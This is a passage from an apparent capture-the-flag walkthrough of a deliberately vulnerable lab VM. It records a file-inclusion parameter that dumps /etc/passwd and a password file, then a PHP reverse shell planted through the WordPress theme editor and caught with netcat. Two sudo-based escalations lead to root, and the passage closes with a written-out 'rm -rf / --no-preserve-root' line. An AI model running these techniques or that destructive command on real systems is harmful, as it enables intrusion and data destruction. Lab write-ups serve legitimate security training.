lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>
GET /image.php?secrettier360=/home/saket/password.txt HTTP/1.1
Host: 192.168.1.237
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 11:39:22 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 215
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>
## Can login with victor:follow_the_ippsec at Wordpress
Lets try a plugin upload
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# locate shell.zip
/opt/htb/blocky/shell.zip
/opt/htb/spectra/shell.zip
/opt/thm/wekor/shell.zip
/opt/vulnhub/shenron2/shell.zip
/opt/vulnhub/shenron3/shell.zip
/root/.local/share/Trash/files/shell.zip
/root/.local/share/Trash/info/shell.zip.trashinfo
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# cp /opt/vulnhub/shenron2/shell.zip .
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.210 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::a00:27ff:fe4a:6d7a prefixlen 64 scopeid 0x20<link>
ether 08:00:27:4a:6d:7a txqueuelen 1000 (Ethernet)
RX packets 14671770 bytes 6921536577 (6.4 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13778458 bytes 2110013880 (1.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1369 bytes 2519405 (2.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1369 bytes 2519405 (2.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
mpqemubr0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 10.239.197.1 netmask 255.255.255.0 broadcast 10.239.197.255
ether 52:54:00:50:6b:a5 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# nano shell.zip
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# unzip shell.zip
Archive: shell.zip
inflating: plugin_shell.php
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# nano plugin_shell.php
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# rm shell.zip
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# zip shell.zip plugin_shell.php
adding: plugin_shell.php (deflated 31%)
Unable to create directory wp-content/uploads/2021/05. Is its parent directory writable by the server?
## Does not work; how about theme editing?
http://192.168.1.237/wordpress/wp-admin/theme-editor.php?file=secret.php&theme=twentynineteen
/* Ohh Finaly you got a writable file */
Paste in /usr/share/webshells/php/php-reverse-shell.php and change IP
Go to http://192.168.1.237/wordpress/wp-content/themes/twentynineteen/secret.php
## Shell
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.237] 35374
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
04:47:56 up 58 min, 0 users, load average: 0.14, 5.37, 18.34
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@ubuntu:/$
www-data@ubuntu:/$ su saket
su saket
Password: follow_the_ippsec
su: Authentication failure
www-data@ubuntu:/$ su victor
su victor
Password: follow_the_ippsec
su: Authentication failure
www-data@ubuntu:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/$ file /home/saket/enc
file /home/saket/enc
/home/saket/enc: executable, regular file, no read permission
www-data@ubuntu:/$
cd /home/saket
www-data@ubuntu:/home/saket$ ls -lash
ls -lash
total 36K
4.0K drwxr-xr-x 2 root root 4.0K Aug 31 2019 .
4.0K drwxr-xr-x 4 root root 4.0K Aug 29 2019 ..
4.0K -rw------- 1 root root 20 Aug 31 2019 .bash_history
16K -rwxr-x--x 1 root root 14K Aug 30 2019 enc
4.0K -rw-r--r-- 1 root root 18 Aug 29 2019 password.txt
4.0K -rw-r--r-- 1 root root 33 Aug 31 2019 user.txt
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ sudo -u root /home/saket/enc
sudo -u root /home/saket/enc
enter password: follow_the_ippsec
follow_the_ippsec
## nothing
www-data@ubuntu:/home/victor$ cd /
cd /
www-data@ubuntu:/$ ls -lash
ls -lash
total 108K
4.0K drwxr-xr-x 24 root root 4.0K Aug 29 2019 .
4.0K drwxr-xr-x 24 root root 4.0K Aug 29 2019 ..
4.0K drwxr-xr-x 2 root root 4.0K May 25 03:48 bin
4.0K drwxr-xr-x 3 root root 4.0K May 25 03:48 boot
4.0K drwxrwxr-x 2 root root 4.0K Aug 29 2019 cdrom
0 drwxr-xr-x 18 root root 3.9K May 25 03:49 dev
12K drwxr-xr-x 136 root root 12K May 25 03:48 etc
4.0K drwxr-xr-x 4 root root 4.0K Aug 29 2019 home
0 lrwxrwxrwx 1 root root 33 Aug 29 2019 initrd.img -> boot/initrd.img-4.10.0-28-generic
4.0K drwxr-xr-x 22 root root 4.0K Aug 29 2019 lib
4.0K drwxr-xr-x 2 root root 4.0K May 25 03:46 lib64
16K drwx------ 2 root root 16K Aug 29 2019 lost+found
4.0K drwxr-xr-x 3 root root 4.0K Aug 1 2017 media
4.0K drwxr-xr-x 2 root root 4.0K Aug 1 2017 mnt
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 opt
0 dr-xr-xr-x 143 root root 0 May 25 03:49 proc
4.0K drwx------ 5 root root 4.0K Aug 31 2019 root
0 drwxr-xr-x 26 root root 800 May 25 03:49 run
12K drwxr-xr-x 2 root root 12K May 25 03:48 sbin
4.0K drwxr-xr-x 2 root root 4.0K May 25 03:49 snap
4.0K drwxr-xr-x 2 root root 4.0K Aug 1 2017 srv
0 dr-xr-xr-x 13 root root 0 May 25 03:49 sys
4.0K drwxrwxrwt 11 root root 4.0K May 25 05:02 tmp
4.0K drwxr-xr-x 11 root root 4.0K Aug 1 2017 usr
4.0K drwxr-xr-x 15 root root 4.0K Aug 29 2019 var
0 lrwxrwxrwx 1 root root 30 Aug 29 2019 vmlinuz -> boot/vmlinuz-4.10.0-28-generic
www-data@ubuntu:/$ ls -lash /opt
ls -lash /opt
total 12K
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 .
4.0K drwxr-xr-x 24 root root 4.0K Aug 29 2019 ..
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 backup
www-data@ubuntu:/$ cd opt
cd opt
www-data@ubuntu:/opt$ cd backup
cd backup
www-data@ubuntu:/opt/backup$ ls -lash
ls -lash
total 12K
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 .
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 ..
4.0K drwxr-xr-x 2 root root 4.0K Aug 30 2019 server_database
www-data@ubuntu:/opt/backup$ cd ser
cd server_database/
www-data@ubuntu:/opt/backup/server_database$ ls -alsh
ls -alsh
total 12K
4.0K drwxr-xr-x 2 root root 4.0K Aug 30 2019 .
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 ..
4.0K -rw-r--r-- 1 root root 75 Aug 30 2019 backup_pass
0 -rw-r--r-- 1 root root 0 Aug 30 2019 {hello.8}
www-data@ubuntu:/opt/backup/server_database$ cat ba
cat backup_pass
your password for backup_database file enc is
"backup_password"
Enjoy!
www-data@ubuntu:/opt/backup/server_database$ file {hello.8}
file {hello.8}
{hello.8}: empty
www-data@ubuntu:/opt/backup/server_database$ sudo -u root /home/saket/enc
sudo -u root /home/saket/enc
enter password: backup_password
backup_password
good
www-data@ubuntu:/opt/backup/server_database$ cd /home/saket
cd /home/saket
www-data@ubuntu:/home/saket$ ls -lash
ls -lash
total 44K
4.0K drwxr-xr-x 2 root root 4.0K May 25 05:04 .
4.0K drwxr-xr-x 4 root root 4.0K Aug 29 2019 ..
4.0K -rw------- 1 root root 20 Aug 31 2019 .bash_history
16K -rwxr-x--x 1 root root 14K Aug 30 2019 enc
4.0K -rw-r--r-- 1 root root 237 May 25 05:04 enc.txt
4.0K -rw-r--r-- 1 root root 123 May 25 05:04 key.txt
4.0K -rw-r--r-- 1 root root 18 Aug 29 2019 password.txt
4.0K -rw-r--r-- 1 root root 33 Aug 31 2019 user.txt
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
https://www.devglan.com/online-tools/aes-encryption-decryption
Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,
www-data@ubuntu:/home/saket$ su saket
su saket
Password: tribute_to_ippsec
saket@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$ file /home/victor/undefeated_victor
file /home/victor/undefeated_victor
/home/victor/undefeated_victor: setuid executable, regular file, no read permission
saket@ubuntu:~$ sudo -u root /home/victor/undefeated_victor
sudo -u root /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:~$ cd /home/victor
cd /home/victor
saket@ubuntu:/home/victor$ ls -lash
ls -lash
ls: cannot open directory '.': Permission denied
saket@ubuntu:/home/victor$ echo fuckyou > /tmp/challenge
echo fuckyou > /tmp/challenge
saket@ubuntu:/home/victor$ sudo -u root /home/victor/undefeated_victor
sudo -u root /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: Permission denied
saket@ubuntu:/home/victor$ ls -lash /tmp
ls -lash /tmp
total 52K
4.0K drwxrwxrwt 11 root root 4.0K May 25 05:17 .
4.0K drwxr-xr-x 24 root root 4.0K Aug 29 2019 ..
4.0K -rw-rw-r-- 1 saket saket 8 May 25 05:17 challenge
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 .font-unix
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 .ICE-unix
4.0K drwx------ 3 root root 4.0K May 25 03:49 systemd-private-2a0f1cb6de0f42d8a22c7e1399dcb7ef-colord.service-gxFdBJ
4.0K drwx------ 3 root root 4.0K May 25 03:49 systemd-private-2a0f1cb6de0f42d8a22c7e1399dcb7ef-rtkit-daemon.service-tbGxx5
4.0K drwx------ 3 root root 4.0K May 25 03:49 systemd-private-2a0f1cb6de0f42d8a22c7e1399dcb7ef-systemd-timesyncd.service-LK4qDN
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 .Test-unix
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 VMwareDnD
4.0K -r--r--r-- 1 root root 11 May 25 03:49 .X0-lock
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 .X11-unix
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 .XIM-unix
saket@ubuntu:/home/victor$ chmod +x /tmp/challenge
chmod +x /tmp/challenge
saket@ubuntu:/home/victor$ sudo -u root /home/victor/undefeated_victor
sudo -u root /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/tmp/challenge: 1: /tmp/challenge: fuckyou: not found
saket@ubuntu:/home/victor$ rm /tmp/challenge
rm /tmp/challenge
saket@ubuntu:/home/victor$ echo sh > /tmp/challenge
echo sh > /tmp/challenge
saket@ubuntu:/home/victor$ chmod +x /tmp/challenge
chmod +x /tmp/challenge
saket@ubuntu:/home/victor$ sudo -u root /home/victor/undefeated_victor
sudo -u root /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -lash
ls -lash
total 92K
4.0K drwx------ 5 root root 4.0K Aug 31 2019 .
4.0K drwxr-xr-x 24 root root 4.0K Aug 29 2019 ..
12K -rw------- 1 root root 8.4K Sep 1 2019 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
4.0K drwx------ 3 root root 4.0K Aug 30 2019 .cache
16K -rwxr-xr-x 1 root root 14K Aug 30 2019 enc
4.0K -rw-r--r-- 1 root root 305 Aug 30 2019 enc.cpp
4.0K -rw-r--r-- 1 root root 237 Aug 30 2019 enc.txt
4.0K -rw-r--r-- 1 root root 123 Aug 30 2019 key.txt
4.0K -rw------- 1 root root 137 Aug 30 2019 .mysql_history
4.0K drwxr-xr-x 2 root root 4.0K Aug 29 2019 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw-r--r-- 1 root root 33 Aug 30 2019 root.txt
4.0K -rw-r--r-- 1 root root 66 Aug 31 2019 .selected_editor
4.0K -rw-r--r-- 1 root root 805 Aug 30 2019 sql.py
4.0K -rwxr-xr-x 1 root root 442 Aug 31 2019 t.sh
4.0K drwxr-xr-x 10 root root 4.0K Aug 30 2019 wfuzz
4.0K -rw-r--r-- 1 root root 170 Aug 29 2019 wordpress.sql
# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Tue May 25 05:18:41 PDT 2021
# cat root.txt
cat root.txt
b2b17036da1de94cfb024540a8e7075a
# exit
## rm -rf / --no-preserve-root